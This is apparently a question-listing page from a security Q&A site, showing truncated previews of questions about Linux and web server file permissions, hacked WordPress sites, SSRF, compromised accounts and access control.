I am a beginner and I am trying to program a secure website to improve my skills and knowledge. I am under Linux and I am using LAMP with php. My website is similar to a social network so people will ...

I am a beginner and I am trying to program a secure website to improve my skills and knowledge. I am under Linux and I am using LAMP with php. My website is similar to a social network so people will ...

Recently, a website I hosted (wordpress I think) for a friend got hacked and all php pages had added code at the bottom in the form of "echo base64_encode(...);". Thus there were unwanted ads on very ...

I know it is not right to set a permission for the folder as 777, but if it is done so will it be possible to upload a file into that directory without ftp access ?
Here is what I mean
Lets say the ...

I have a couple of CentOS VMs as part of a class I'm taking, I'm just trying to understand how loose permissions (other than the obvious 777) can be taken advantage of.
The targetted account on VM1 ...

The default setting is that the apache2 root-directory Documents is owned by root and I have to enter a password each time I change it. This is why I want to give full permissions to my user account ...

I just discovered this fact tonight and I was rather floored by it. Isn't that a gaping security flaw? I realize that an external drive is less secure by virtue of the fact that someone could simply ...

I am running my own server, on which I have different services (Nginx etc.).
All these (internet) services are / should be secured with SSL (offcialy signed).
The key files / certificates are located ...

As far as I understand if Dropbox wants to automatically run in the background without asking the user for a password it has to store the password somewhere on the harddrive and has currently no way ...

Having /var/www/site.com owned by www-data:www-data with a 750 permission for directories and 640 for files, and having my user alexb added to www-data group, I found my self with permission issues ...

I'm a Software Engineer, but I have no experience in security, so i'm trying to learn by doing (woot Experiential learning!).
I know that the permission settings on the tmp folder are very relaxed. ...

If I was able to view any page on a website as localhost using SSRF, what files should I check for? I checked to see if I could view robots.txt normally, and I couldn't, but using SSRF, I was able to. ...

The "Phone State" permission on Android is widely requested by many apps. The explanation often given by the developer is that the app needs it in order to determine when you're on the phone, to stop ...

I was wondering, assuming a "The Invention of Lying" world, but where no one was able to steal or misrepresent themselves how much faster would computers be? Just to give two examples of what I mean, ...

Lets say a web application has four user roles. Standard, Supervisor, Manager and Administrator.
Should a manager be able to promote someone else to a Manager, or only to a supervisor?
I realize in ...

I am not sure about that. It should run in kernel mode in order to avoid some user-mode program to kill/suspend the firewall and do its dirty job.
The malware would not be able to kill the firewall ...

I need to re-work our current security model for desktop computers, and would like some insight as to what changes can be made as well as best practices.
Currently we have the helpdesk role that is ...

I want to do inter process communication between Firefox (via extension) and my application. Both reside in "Program files" (of windows 7 OS). I also assume that malware is running in the system and ...

While installing a new XP machine that had not been connected to the domain I was browsing to a UNC path and was not prompted for authentication. I then went to the different mapped drives and found ...

The default Debian way of setting up a common web server (Nginx) is to run the main process as root and unprivileged workers as www-data. In order to allow for the worker processes to read/execute web ...

I fail to grasp the necessity of using concept of owner (ownership) and find clear explanation of its necessity.
What cannot be done without concept of owner(ownership) in filesystem/database object ...

I've compromised two Linux user accounts on a RHEL machine (neither of which have root permissions) and I want to determine which account is more 'useful' to me in terms of access and privileges. Is ...

I have a server for which I have created a cron job "sendalerts" to users. Mind you this "sendalerts.php" should be runnable from two methods (via browser and also via a cron job)
So cron's job is to ...

I have found on my web server the file wp-conf.php which when you call it from the browser with a url parameter like wp-conf.php?t7831n=any value shows an interface where you can control the entire ...

I have a new WordPress website that has been installed on a server not managed by me. Its admin has enforced a few rules in order to increase security, I'm not entirely aware of its entirety but it ...

I recently found that in Microsoft .NET framework an impersonated thread is not allowed to request "time at which the current process was started". This could be done intentionally or this could be ...